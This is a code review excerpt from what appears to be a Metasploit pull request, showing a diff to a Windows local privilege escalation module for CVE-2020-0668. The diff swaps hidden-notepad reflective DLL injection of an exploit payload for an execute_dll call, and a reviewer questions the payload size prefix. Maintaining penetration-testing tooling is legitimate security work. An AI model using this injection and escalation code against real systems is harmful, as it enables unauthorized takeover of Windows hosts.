modules/exploits/windows/local/cve_2020_0668_service_tracing.rb

```diff
@@ -139,39 +142,13 @@ def remove_file(file_pathname)
     end
   end
 
-  def setup_process
-    begin
-      print_status('Launching notepad to host the exploit...')
-      notepad_process = client.sys.process.execute('notepad.exe', nil, 'Hidden' => true)
-      process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS)
-      print_good("Process #{process.pid} launched.")
-    rescue Rex::Post::Meterpreter::RequestError
-      # Sandboxes could not allow to create a new process
-      # stdapi_sys_process_execute: Operation failed: Access is denied.
-      print_error('Operation failed. Trying to elevate the current process...')
-      process = client.sys.process.open
-    end
-    process
-  end
-
-  def inject_magic(process)
-    library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'uso_trigger', 'uso_trigger.x64.dll')
-    library_path = ::File.expand_path(library_path)
-
-    print_status("Reflectively injecting the trigger DLL into #{process.pid}...")
-    dll = ''
-    ::File.open(library_path, 'rb') { |f| dll = f.read }
-    exploit_mem, offset = inject_dll_data_into_process(process, dll)
-    vprint_status('Trigger injected.')
-    payload_mem = inject_into_process(process, payload.encoded)
-    print_status('Trigger injected. Starting thread...')
-    process.thread.create(exploit_mem + offset, payload_mem)
-  end
-
   def launch_dll_trigger
-    print_status('Trying to start notepad')
-    process = setup_process
-    inject_magic(process)
+    print_status('Triggering the Reflective DLL injection and running the LPE DLL...')
+    encoded_payload = payload.encoded
+    execute_dll(
+      ::File.join(Msf::Config.data_directory, 'exploits', 'uso_trigger', 'uso_trigger.x64.dll'),
+      [encoded_payload.length].pack('I<') + encoded_payload
+    )
```

Comment:
Same thing here where it does not look like the DLL is expecting to have the payloads size prefixed to it.

Reply:
Fixed in https://github.com/rapid7/metasploit-framework/pull/15384/commits/0d540b9ee3b1836918eee99e9d2533fb1110bd11